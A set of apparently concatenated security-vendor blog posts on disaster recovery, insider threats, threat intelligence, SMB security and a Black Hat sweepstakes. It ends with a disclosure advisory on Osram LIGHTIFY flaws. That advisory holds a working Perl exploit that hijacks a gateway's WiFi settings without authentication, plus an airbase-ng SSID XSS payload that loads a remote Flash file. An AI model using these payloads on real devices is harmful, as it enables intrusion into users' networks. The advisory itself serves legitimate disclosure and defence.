Use this incident, and the Southwest Airlines outage a few weeks earlier that lasted four days, to review your business continuity/disaster recovery plans, and especially to create them if you don't have any in place. Test your recovery plans at regular intervals, using tabletop walkthroughs and actual recovery techniques, and make upper management aware of the outcomes. Use these results to drive improvements in planning for availability, and you can avoid or reduce the impact of a disaster scenario. And always remember to revisit and update your plan at regular intervals, especially at the conclusion of a test, to ensure you have up-to-date and relevant information.

 

At a minimum, your disaster plan should include:

 

  • Paper copies of everything relevant to the disaster plan; online resources will likely be disrupted, even if you have highly available systems or cloud-based ones
  • Contact information of all relevant stakeholders in a disaster; C-levels, technicians, business people, customers; anyone who would need to be part of the recovery scenarios; include physical addresses of sites and phone numbers of required resources
  • A list of required vendors your organization needs to operate in the event of a disaster scenario; include contact information for those vendors
  • A map of all systems which would function on backup power; include all the networking devices between the systems (switches, routers, storage); map the systems to business functions so you can see visually which functions would be disrupted and which would be operational
  • Maps of physical locations that are relevant to disaster recovery
  • Forms which are critical to business operations such as supply order forms, injury reports, expense tracking, etc
  • Disaster declaration procedures, and communication procedures (who to contact when, who is in charge of media relations, etc)
  • Checklists and runbooks for operations processes; these are required so that the distractions of a disaster do not impact running operations, and so that tasks don't rely on memory or specialist skill to accomplish

 

This is just a short list, and does not go into the specifics of disaster planning, but it's a good start and validation point. Once you have checked off this list, start to look at recovery time objectives (RTO), recovery point objectives (RPO), and true business continuity process (processes which allow business to continue uninterrupted, even during an outage). There's a host of resources online and third party providers which are available to help.

 

According to the WSJ article, “It’s not clear the priorities in our investment have been in the right place,” Mr. Bastian said. “It has caused us to ask a lot of questions which candidly we don’t have a lot of answers for.” Upper management can be reluctant to put money into disaster recovery, seeing it more as an insurance policy, which it partially is. Testing isn't just for vetting your plans; it also helps ensure that priorities get positioned correctly. If testing shows that not all systems would be recoverable, then investment can be justified.

 

Disaster planning requires time and some resources to accomplish. This is an investment in the future, and any time invested now will be offset by the reduction in recovery time later, and hopefully, the lessened impact on your business operations.

Read most security vendors’ websites (yes, we know what we are) and you’ll generally find something about the terrifying “Risk of Insider Threats.” Rogue employees are lurking around every corner. You try to hire good, honest people, brimming with integrity, but still these evildoers slip through the net and before you know it they are trying to take you down. They don’t care that you have a family to feed, or that you put your life and soul into creating a flourishing business. Maybe you should just go self-employed. Switch off the internet and go back to pen and paper. Reduce the risk completely and become a cave-dwelling hermit. Actually, can you come back out of the cave and turn the internet back on for a moment please? Thanks.

 

I hope the mild exaggeration in the above paragraph was apparent. And if that’s the reality in your business, perhaps it’s time to rethink your hiring strategy (and maybe go back to the cave after all; it was nice in there, right?). Most of your employees really like that you have a business; they don’t want to ruin it, and they aren’t going to do something purposely malicious. There is a BUT coming, though. Actually, there are two, because reality is a harsh mistress.

BUT #1... Insider threats are real.

I’m sorry, I’m being That Vendor. We haven’t invented this as an industry, I promise. It does only take one person to cause a lot of potential damage – take the recent Sage data breach as an example: hundreds of detailed financial customer records were accessed by an unauthorised* employee. At the time of writing this, the Sage investigation is ongoing - an arrest has been made, and a lot of Sage's customers have received a notification that their details may have been on the list. Like I said, it just takes one.

 

*that isn't a typo btw, I’m from that tiny island over the pond, we just don't do zeds with the same level of enthusiasm that Americans do #sorrynotsorry

 

BUT #2... Unwitting insider threats are a much greater concern.

This isn’t a disgruntled employee, it’s someone who can easily open up your business to the evils of the outside world. They clicked on a dodgy Facebook link from a friend, they opened up an "invoice" which turned out to be hiding malicious code, they chomped down on the hook of a phishing email and before you can say Wicked Tuna, there’s a keylogger or worse sitting on their PC. Their user credentials get captured and delivered off to someone truly malicious outside of your organisation. Your employee didn’t mean to cause a problem, they just didn’t know any better. And they’d possibly do the same thing all over again tomorrow.

 

Understanding the risk posed by your employees, the users of your systems, the people who access critical data that’s key to your business is so much bigger than worrying about the occasional rogue employee.

 

Bonus BUT (because marketing)... Compromised user credentials behave just like insider threats

Protecting assets is an important part of any security program, no doubt about it, but a huge number of data breaches are caused by compromised user credentials (the Verizon Data Breach Investigations Report has had this as the top method of attackers breaching a network every year since 2013). These are user accounts that look, feel and smell like the real deal because That’s Exactly What They Are. They just got into the wrong hands. And if you fall into the 60% of organisations who have no way to detect compromised credentials, you won’t be able to tell the difference between a bona fide user and an attacker using a compromised account. On the plus side, they won't be hogging the drinks table at your summer party, but that's really the smallest of wins.

 

Call to action: Don’t be a hermit!

If you’re thinking seriously about that cave option again, it’s OK, you don’t need to (unless cave dwelling is actually your thing, but let’s assume otherwise because it’s a little niche). Take stock, think about where your weak spots are. Would your employees benefit from some up-to-date security awareness training? How robust are those incident response processes?  When did you last health-check your overall security program? Do you have the capabilities to quickly spot an attacker who’s got their grubby mitts on the keys to your metaphorical castle (or cave, obvs)?

 

If the answers to those questions aren’t clear, we can help you get a plan together. You can gain the insight you need to be able to protect your business. Visit our web page on compromised credentials and learn more about how we can help you achieve this.

 

Samantha Humphries

The SANS State of Cyber Threat Intelligence Survey has been released and highlights some important issues with cyber threat intelligence:

 

Usability is still an issue - Almost everyone is using some sort of cyber threat intelligence. Hooray! The downside – there is still confusion as to the best ways to implement and utilize threat intelligence, and the market is not making it any easier. We believe that the confusion is related to the initial push by threat intelligence vendors to sell list-based threat intelligence – lists of IPs, lists of domains, etc – with little, or even worse, no context. This type of threat feed is data, not intelligence, but it is easy to put together and it isn’t too difficult to integrate with security tools that are used to receiving blacklists or signature based threat data. That…well…to put it nicely, doesn’t exactly work. The survey shows that over 60% of respondents are using threat intelligence to block malicious domains or IP addresses, which contributes to high false positives and a nebulous idea of what threat intelligence is actually supposed to be doing. However, nearly half use threat intelligence to add context to investigations and assessments, which is a much better application of threat intelligence and even though it uses some of the same data sources, it requires the additional analysis that actually turns it into intelligence. A smaller number of respondents reported that they use threat intelligence for hunting or to provide information to management (28 and 27 percent, respectively), but it appears that these areas are growing as organizations identify the value they provide.

 

Threat Intelligence helps to make decisions - 73% of respondents said that they felt they could make better and more informed decisions by using threat intelligence. 71% said that they had improved visibility into threats by using threat intelligence. These are both key aspects of threat intelligence and indicate that more organizations are using threat intelligence to assist with decision making rather than only focusing on the technical, machine to machine aspect of threat intel.  One of the overarching goals in intelligence work in general is to provide information to decision makers about the threats facing them, and it is great to see that this application of CTI is growing. CTI can be used to support every aspect of a security program, from determining general security posture and acceptable level of risk to prioritizing patching and alerting, and threat intelligence can provide insight to support all of these critical decisions.

 

More isn’t necessarily better – the majority of respondents who engage in incident response or hunting activities indicated that they could consume only 11-100 indicators of compromise on a weekly basis, and can only conduct in-depth research and analysis on 1-10 indicators per week. Since there are approximately eleventy-billion indicators of compromise being generated and exchanged every week that puts a lot of pressure not only on analysts, but on the tools we use to automate the collection and processing of data. Related – two of the biggest pain points respondents had with implementing cyber threat intelligence are the lack of technical capabilities to integrate CTI tools into environments, and the difficulty of implementing new security systems and tools. In order to automate the handling of large amounts of indicators in a way that allows analysts to zero in on the most important and relevant ones, we need to have confidence in our collection sources, confidence in our tools, and confidence in our processes. More of the wrong type of data isn’t better, it distracts from the data that is relevant and makes it nearly impossible for a threat intelligence analyst to actually conduct the analysis needed to extract value.

 

Download the SANS State of Cyber Threat Intelligence Survey here.

 

To learn more about our approach to integrating threat intelligence into incident detection and response processes, come join us for an IDR intensive session at our annual conference, UNITED Summit.

This is a guest post from our frequent contributor Kevin Beaver. You can read all of his previous guest posts here.

 

Small and medium-sized businesses (SMBs) have it made in terms of security. No, I’m not referring to the threats, vulnerabilities, and business risks. Those are the same regardless of the size of the organization. Instead, I’m talking about how relatively easy it is to establish and build out core information security functions and operations when the business is small. Doing this in an organization with a handful of employees – maybe a dozen or two – that has a simple network and application environment (in-house and in the cloud) is unbelievably simple compared to doing it in larger organizations.

 

I’ve helped several small businesses build out their policies, security testing/assessment processes, and technologies over the years and it’s so neat to see how they’ve been able to progress from essentially firewalls and anti-virus to a full-blown IT/security governance program that rivals that of any large enterprise – all with minimal effort over time, relatively speaking. It’s the equivalent of parents establishing good habits around eating and exercising in young children that they learn from and build upon for the rest of their lives instead of doctors and dieticians having to convince a 45-year-old type 2 diabetic that he has to change his entire lifestyle if he’s going to fix his heart problems and live past 50. The former is much easier (and less costly) than the latter.

 

One of the biggest challenges with SMBs is that they may not think they’re a target, may not think they have to comply with the various security and privacy regulations, or may not even know about information security practices at all. The former two resolve themselves pretty quickly through breaches and pressure from business partners and customers, who are often large businesses with stringent security requirements. The latter is the biggest concern, in large part due to these businesses’ third-party IT consultants/service providers not fully understanding security. Many, perhaps most, small businesses start out using an outside IT services provider, and I’ve witnessed a fox-guarding-the-henhouse situation numerous times over the years whereby these outside providers implement firewalls, anti-virus software, and data backup solutions, and that’s where security begins and, unfortunately, ends.

 

Another situation that builds on this is something I see with many smaller businesses: technologies and policies are put in place but a security assessment is never performed to determine where things truly stand. It's the cart before the horse. The builder remediation before the home inspection. The chemotherapy before the CT scan. You can’t force people to look past their false sense of security but it sure is a big oversight in the SMB space that needs some quick attention.

 

So, SMB security is simple, but it can become complicated if it’s made out to be. The choice is yours – focus on security now while you’re young and reap the rewards of simplicity, or put it off so it’s more expensive and exponentially more complicated when you’re forced to address it down the road. If you own, work for, or serve as a consultant to a small or medium-sized business, make the decision to start and build out a basic information security program. Don’t wait, get started on it now and grow into it over time. It’ll be so much easier to tweak as complexity grows with the business than having to start from scratch. Something that I can say with conviction because I’ve been a part of it: you will not regret it.

First off: Hi! I’m the new community manager here at Rapid7. And like many in the security community, I’ll be heading to Vegas for Black Hat, BSidesLV and DEF CON in a little more than a week. I’m looking forward to diving right in to meeting the community and learning from some of the smartest professionals in the industry. I’ve prepped by reading last year’s Black Hat Attendee Guide and if you’re heading to Vegas, I recommend you take a look, too.

 

I’d also like to introduce you to someone else. The Rapid7 Moose.

 

At Rapid7, we refer to ourselves as "Moose" because the plural and the singular are the same word. When we refer to ourselves as moose, we are saying that while we all strive for excellence as individuals, we are stronger working together as a team with shared goals. And we firmly believe this extends to our customers and community. After all, by working together, the community is able to support and educate each other to keep fighting for better security.

 

To demonstrate this philosophy about community-based security, and the power of working together, we will be introducing the Moose at our Black Hat Booth, #532.  We’re talking about a nine-foot moose here, so we encourage you to come by and take some photos with the Moose and share them on Twitter to enter our Black Hat sweeps.

 

Here’s the scoop:

Take a picture with our moose, tag #BHUSA and @rapid7 to be entered to win an Oculus Rift. Can’t come to the booth? Just share a moose pun or joke with @rapid7 and tag #BHUSA and you’ll be entered as well! Sweeps will open on August 3 and close on August 5 (plenty of time to get those pics uploaded or jokes shared after exhibits close). See below for official terms and conditions.


 

 

Rapid7 Black Hat Twitter Sweeps

Terms & Conditions

 

The promotion is only open to residents in the United States and Canada who must be aged 18 or over.

 

No purchase is necessary to participate in the sweeps. Eligibility is dependent on following the entry rules outlined in this guide. Multiple entries will be accepted; however, no third party or bulk entries will be accepted. Entry submissions may not contain, as determined by Rapid7, any content that is obscene or offensive or violates any law.

 

To enter: On Twitter, share a post that includes either 1) a picture of the moose from Black Hat Booth #532 and the tag #BHUSA and @rapid7 or 2) a moose pun and the tag #BHUSA and @rapid7.

 

The sweeps will open on Wednesday, August 3, 2016 at 09:00:01 a.m. PT and close on Friday, August 5, 2016 at 09:59:59 p.m. PT. Entries made after these times will not be accepted.

 

One winner will be picked at random from the received eligible entries for the sweeps. The draw will take place by Tuesday, August 9 by 11:59:59 p.m. ET. The winner will be notified via the Rapid7 Twitter page and will have 48 hours to respond via direct message to claim the prize. If the prize is unclaimed after 48 hours, an alternate winner will be selected.

 

The prize for this sweeps is an Oculus Rift (estimated value $599) and will be shipped as soon as possible after the date of response from the winner. Prize is non-transferable or exchangeable. No cash or credit alternative is available. Should the prize become unavailable for any reason, Rapid7 reserves the right to provide a substitute prize of approximately equivalent or greater value. The winner list can be obtained after Monday, August 22, 2016 by emailing community @ rapid7 (dot) com.

 

Sweeps host is Rapid7 LLC, 100 Summer St, Boston, MA 02110.

 

By entering the sweeps, you agree to these terms and conditions. Employees and the immediate families of Rapid7 may not participate.

 

If you have any concerns or questions related to these terms and conditions, please email community @ rapid7 (dot) com.

Nine issues affecting the Home or Pro versions of Osram LIGHTIFY were discovered, with the practical exploitation effects ranging from the accidental disclosure of sensitive network configuration information, to persistent cross-site scripting (XSS) on the web management console, to operational command execution on the devices themselves without authentication. The issues are designated in the table below. At the time of this disclosure's publication, the vendor has indicated that all but the lack of SSL pinning and the issues related to ZigBee rekeying have been addressed in the latest patch set.

 

Description                              Status     Platform    R7 ID           CVE
Cleartext WPA2 PSK                       Fixed      Home        R7-2016-10.1    CVE-2016-5051
Lack of SSL Pinning                      Unfixed    Home        R7-2016-10.2    CVE-2016-5052
Pre-Authentication Command Execution     Fixed      Home        R7-2016-10.3    CVE-2016-5053
ZigBee Network Command Replay            Unfixed    Home        R7-2016-10.4    CVE-2016-5054
Web Management Console Persistent XSS    Fixed      Pro         R7-2016-10.5    CVE-2016-5055
Weak Default WPA2 PSKs                   Fixed      Pro         R7-2016-10.6    CVE-2016-5056
Lack of SSL Pinning                      Unfixed    Pro         R7-2016-10.7    CVE-2016-5057
ZigBee Network Command Replay            Unfixed    Pro         R7-2016-10.8    CVE-2016-5058
Cached Screenshot Information Leak       Fixed      Pro         R7-2016-10.9    CVE-2016-5059

 

Product Description

According to the vendor's January 2015 press release, Osram LIGHTIFY provides "a portfolio of cost-effective indoor and outdoor lighting products that can be controlled and automated via an app on your mobile device to help you save energy, enhance comfort, personalize your environment, and experience joy and fun." It is used by both residential and commercial customers, via the Home and Pro versions, respectively. As a "smart lighting" offering, Osram LIGHTIFY is part of the Internet of Things (IoT) landscape, and is compatible with other ZigBee-based automation solutions.

Credit

These issues were discovered by Deral Heiland, Research Lead at Rapid7, Inc., and this advisory was prepared in accordance with Rapid7's disclosure policy.

Exploitation and Mitigation

R7-2016-10.1: Cleartext WPA2 PSK (Home) (CVE-2016-5051)

Examination of the mobile application for LIGHTIFY Home, running on an iPad, revealed that the WiFi WPA2 pre-shared key (PSK) of the user's home WiFi network is stored in cleartext in the file /private/var/mobile/Containers/Data/Application/F1D60C51-6DF5-4AAE-9DB1-40ECBDBDF692/Library/Preferences/com.osram.lightify.home.plist. Examining this file reveals the cleartext string, as shown in Figure 1:

Figure 1: Cleartext WPA2 PSK

 

If the device is lost or stolen, an attacker could extract this data from the file.

Mitigation for R7-2016-10.1

A vendor-supplied patch should configure the mobile app to prevent storing potentially sensitive information, such as WiFi PSKs and passwords in cleartext. While some local storage is likely necessary for normal functionality, such information should be stored in an encrypted format that requires authentication.

 

Absent a vendor-supplied patch, users should avoid connecting the product to a network that is intended to be hidden or restricted. In cases where this is undesirable, users should ensure that the mobile device is configured for full-disk encryption (FDE) and require at least a password on first boot.

R7-2016-10.2: Lack of SSL Pinning (Home) (CVE-2016-5052)

Examination of the mobile application reveals that SSL pinning is not in use. By not implementing SSL pinning, it is possible for an attacker to conduct a Man-in-the-Middle (MitM) attack, ultimately exposing SSL-encrypted traffic to the successful attacker for inspection and manipulation.

Mitigation for R7-2016-10.2

A vendor-supplied patch should configure the mobile application to use SSL pinning.

 

Absent a vendor-supplied patch, users should avoid using the mobile application in potentially hostile networks.

R7-2016-10.3: Pre-Authentication Command Execution (Home) (CVE-2016-5053)

Examination of the network services on the gateway shows that port 4000/TCP is used for local control when Internet services are down, and no authentication is required to pass commands to this TCP port. With this access, an unauthenticated actor can execute commands to change lighting, and also execute commands to reconfigure the devices. The following Perl script proof of concept code can be used to reconfigure a vulnerable device's primary WiFi connection, causing it to reconnect to an attacker-supplied WiFi network.

 

#!/usr/bin/perl
# POC to change SSID setting on OSRAM LIGHTIFY GATEWAY
# Deral Heiland, Rapid7, Inc.

use IO::Socket;
if ($#ARGV != 2) {
  print " You are missing needed Arguments\n";
  print "Usage: lightify_SSID_changer.pl TargetIP SSID WPA_PSK \n";
  exit(1);
}

# Input variables
my $IP = $ARGV[0];
my $SSID = $ARGV[1];
my $WPAPSK = $ARGV[2];

# Set up TCP socket
$socket = new IO::Socket::INET (
  PeerAddr => $IP,
  PeerPort => 4000,
  Proto => 'tcp',   # protocol name must be lowercase for getprotobyname()
  )
or die "Couldn't connect to Target\n";

#Set up data to send to port 4000
$data1 = "\x83\x00\x00\xe3\x03\x00\x00\x00\x01";
$data2 = pack('a33',"$SSID");
$data3 = pack('a69',"$WPAPSK");
$data4 = "\x04\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$send_data = join "", $data1, $data2, $data3, $data4;

#send data to port 4000
$socket->send($send_data);
close $socket;
exit;

 

 

Mitigation for R7-2016-10.3

A vendor-supplied patch should implement and enforce authentication on the gateway's 4000/TCP interface.

 

Absent a vendor-supplied patch, users should not deploy the gateway in a network environment used by potentially malicious actors.

R7-2016-10.4: ZigBee Network Command Replay (Home) (CVE-2016-5054)

Examination of the ZigBee home automation communication reveals that no rekeying of the ZigBee secure communication takes place after the initial pairing of the ZigBee-enabled end nodes (the light components of the system). Due to this lack of routine rekeying, it is possible for a malicious actor to capture the ZigBee communication at any time and later replay those commands to disrupt lighting services, without any other form of authentication.

Mitigation for R7-2016-10.4

The current ZigBee Home Automation protocol standard suffers from weaknesses that prevent properly securing ZigBee Home Automation communication. Resolving these inherent security flaws requires changes to the core protocol, which is under the control of the ZigBee Alliance (http://www.zigbee.org/).

 

Absent corrections of the Zigbee Home Automation protocol, users should not deploy the lighting components in a network environment used by potentially malicious actors.

R7-2016-10.5: Web Management Console Persistent XSS (Pro) (CVE-2016-5055)

The installed web management console, which runs on ports 80/TCP and 443/TCP, is vulnerable to a persistent Cross Site Scripting (XSS) vulnerability. This vulnerability allows a malicious actor to inject persistent JavaScript and HTML code into various fields within the Pro web management interface. When this data is viewed within the web console, the injected code will execute within the context of the authenticated user. As a result, a malicious actor can inject code which could modify the system configuration, exfiltrate or alter stored data, or take control of the product in order to launch browser-based attacks against the authenticated user's workstation.

 

The first example of this flaw was found by injecting persistent XSS into the security logs via the username field during the basic authentication sequence, as shown below in Figure 2.

Figure 2: Username XSS Injection

 

Anything entered in the "User Name" field gets written to the security logs without sanitization. When these logs are reviewed, the JavaScript is rendered and executed by the victim's browser. Figure 3 demonstrates an alert box run in this way.

Figure 3: Injected JavaScript Alert Box

The second example of this flaw was found by injecting XSS into the Wireless Client Mode configuration page. This was accomplished using a rogue access point to broadcast an SSID containing the XSS payload. Using the following airbase-ng command, it is possible to broadcast the XSS payload as an SSID name.

 

airbase-ng -e '</script><embed src=//ld1.us/4.swf>' -c 9 wlan0mon

 

When the SSID of </script><embed src=//ld1.us/4.swf> is displayed on the Wireless Client Mode configuration page, the referenced Flash file is downloaded and run in the context of the authenticated user. This is shown in Figure 4.

Mitigation for R7-2016-10.5

A vendor-supplied patch should ensure that all data is filtered and that special characters such as < and > are properly escaped before being displayed by the web management console.
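The management console is presumably not written in Python, but the output-encoding principle the mitigation describes can be illustrated in a couple of lines (illustration only, not the vendor's actual fix):

import html

# Escape markup before it reaches the page; the string is the SSID payload
# from the example above.
untrusted = "</script><embed src=//ld1.us/4.swf>"
print(html.escape(untrusted))
# prints: &lt;/script&gt;&lt;embed src=//ld1.us/4.swf&gt;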

 

Absent a vendor-supplied patch, users should not deploy the web management console in a network environment used by potentially malicious actors.

R7-2016-10.6: Weak Default WPA2 PSKs (Pro) (CVE-2016-5056)

Weak default WPA2 pre-shared keys (PSKs) were identified on the devices examined, which used an eight-character PSK drawn only from the characters "0123456789abcdef". This extremely small keyspace (16^8, or roughly 4.3 billion candidates) of limited characters and fixed, short length makes it possible to crack a captured WPA2 authentication handshake in less than 6 hours, leading to remote access to the cleartext WPA2 PSK. Figure 5 shows the statistics of cracking the WPA2 PSK on one device in 5 hours and 57 minutes.

Figure 5: Hashcat Cracking WPA2 PSK in Under Six Hours

 

A second device's WPA2 PSK was cracked in just 2 hours and 42 minutes, as shown in Figure 6:

Figure 6: Hashcat Cracking WPA2 PSK in Under Three Hours
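As a back-of-the-envelope check on why crack times in the single-digit hours are plausible, the arithmetic is straightforward; the guess rate below is an assumption for illustration only, since real GPU cracking rigs vary widely:

# Worst-case exhaustive search over the default keyspace.
keyspace = 16 ** 8                 # eight hexadecimal characters
guesses_per_second = 200000        # assumed WPA2 PSK guess rate (illustrative)
worst_case_hours = keyspace / guesses_per_second / 3600.0

print("%d candidate PSKs" % keyspace)                # 4294967296
print("~%.1f hours worst case" % worst_case_hours)   # ~6.0 hours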

Mitigation for R7-2016-10.6

A vendor-supplied patch should implement longer default PSKs drawn from a larger keyspace that includes uppercase and lowercase alphanumeric characters and punctuation, since these keys are not typically intended to be remembered by humans.

 

Absent a vendor-supplied patch, users should set their own PSKs following the above advice rather than relying on the defaults shipped by the vendor (see the sketch below).
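A minimal sketch of generating such a key, assuming the device's WiFi stack accepts any printable ASCII passphrase up to 63 characters:

import secrets
import string

# 24 characters drawn from letters, digits and punctuation; adjust the
# length and alphabet to what the device actually accepts.
ALPHABET = string.ascii_letters + string.digits + string.punctuation

def random_psk(length=24):
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

print(random_psk())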

R7-2016-10.7: Lack of SSL Pinning (Pro) (CVE-2016-5057)

As in the Home version of the system, the Pro version does not implement SSL pinning in the mobile app. See R7-2016-10.2: Lack of SSL Pinning (Home) (CVE-2016-5052), above.

R7-2016-10.8: ZigBee Network Command Replay (Pro) (CVE-2016-5058)

As in the Home version of the system, the Pro version does not implement rekeying of the ZigBee commands. See R7-2016-10.4: ZigBee Network Command Replay (Home) (CVE-2016-5054), above.

R7-2016-10.9: Cached Screenshot Information Leak (Pro) (CVE-2016-5059)

Examination of the commissioning app revealed that the application caches a screenshot of the current page when the iPad home button is pressed, storing it in the folder /private/var/mobile/Containers/Data/Application/A253B0DA-CFCE-433A-B0A1-EAEB7B10B49C/Library/Caches/Snapshots/com.osram.LightifyPro/com.osram.LightifyPro.

 

This practice can often lead to confidential data being stored within the snapshot folder on the iPad. As shown in Figure 7, the plaintext password of the gateway is visible in the cached screenshot.

 

Mitigation for R7-2016-10.9

A vendor-supplied patch should use a default page for the downscale (screenshot) function when the home button is pressed, and should ensure that all passwords and keys displayed on the application configuration pages are obfuscated with asterisks.

 

Absent a vendor-supplied patch, users should be mindful of when they minimize the running mobile application to avoid accidentally disclosing sensitive information.

Disclosure Timeline

  • Mon, May 16, 2016: Initial contact to the vendor by Rapid7.
  • Tue, May 17, 2016: Vendor acknowledged receipt of vulnerability details.
  • Tue, May 31, 2016: Details disclosed to CERT/CC (Report number VR-174).
  • Wed, Jun 01, 2016: CVEs assigned by CERT/CC.
  • Thu, Jul 07, 2016: Disclosure timeline updated and communicated to the vendor and CERT/CC.
  • Thu, Jul 21, 2016: Vendor provided an update on patch development.
  • Tue, Jul 26, 2016: Public disclosure of the issues.

 

Update (Aug 10, 2016): Added a note about the Zigbee protocol for R7-2016-10.4 in the summary section.
